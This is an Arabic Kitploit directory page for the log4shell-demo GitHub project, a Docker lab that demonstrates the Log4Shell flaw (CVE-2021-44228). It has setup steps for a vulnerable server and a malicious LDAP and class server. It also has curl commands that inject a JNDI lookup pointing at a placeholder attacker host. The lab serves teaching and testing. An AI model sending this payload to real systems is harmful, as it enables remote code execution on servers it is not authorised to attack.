Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4Shell-demo — عرض توضيحي لكيفية عمل ثغرة Log4Shell / CVE-2021-44228 | Kitploit
أدوات/GitHubGitHub/mschmnet/log4shell-demo
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubmschmnet/log4shell-demo

Log4Shell-demo

عرض توضيحي لكيفية عمل ثغرة Log4Shell / CVE-2021-44228

عرض المستودع
711منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Log4Shell في العمل

يهدف هذا المشروع إلى توضيح كيفية عمل ثغرة Log4Shell / CVE-2021-44228.

المتطلبات

تحتاج فقط إلى تثبيت Docker. ومن الأفضل أن يكون لديك جهازان افتراضيان مختلفان. أحدهم للخادم الضعيف (vulnerable server) والآخر للخادم الخبيث (malicious server) الذي سيستضيف قاعدة الكود الخبيثة وخادم LDAP.

بشكل اختياري، يمكنك تثبيت Make و Docker Compose، لكن هذا ليس ضروريًا لأن هذا المستودع يحتوي أيضًا على make.sh لتجاوز هذه المتطلبات واستخدامها من داخل حاوية docker.

تثبيت Docker (اختياري)

إذا لم تكن قد قمت بذلك بالفعل، فإليك خطوات تثبيت Docker على جهاز افتراضي يعمل بنظام Debian. يمكنك استخدام هذه الخطوات: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46

تنزيل المستودع

root@kitploit:~
git clone [email protected]:mschmnet/Log4Shell-demo.git 

تثبيت الخادم الضعيف

root@kitploit:~
cd vulnerable-server
../make.sh run # Or you coud execute make run if you hade Make and Docker Compose installed

بدء تشغيل الخادم الخبيث

سيؤدي هذا إلى تشغيل خادم LDAP أساسي وخادم Python أساسي لتقديم فئات Java الخبيثة.

تحتاج إلى توفير عنوان IP أو اسم النطاق حيث ستكون هذه الخوادم متاحة

root@kitploit:~
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally make instead of ../make.sh if you had Make and Docker Compose installed

كيفية مهاجمة الخادم الهدف

root@kitploit:~
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint

أو فقط

root@kitploit:~
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'

حيث ${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a} هو مجرد ترميز URL

كيفية إيقاف أيٍّ منهما

root@kitploit:~
../make.sh stop

كيفية عرض السجلات

root@kitploit:~
../make.sh logs 

الشرائح

https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf

تنزيل الأداة